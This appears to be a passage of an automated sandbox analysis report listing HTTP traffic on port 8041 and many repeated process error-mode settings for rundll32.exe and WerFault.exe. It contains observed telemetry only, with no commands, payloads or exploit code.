Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49797

Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
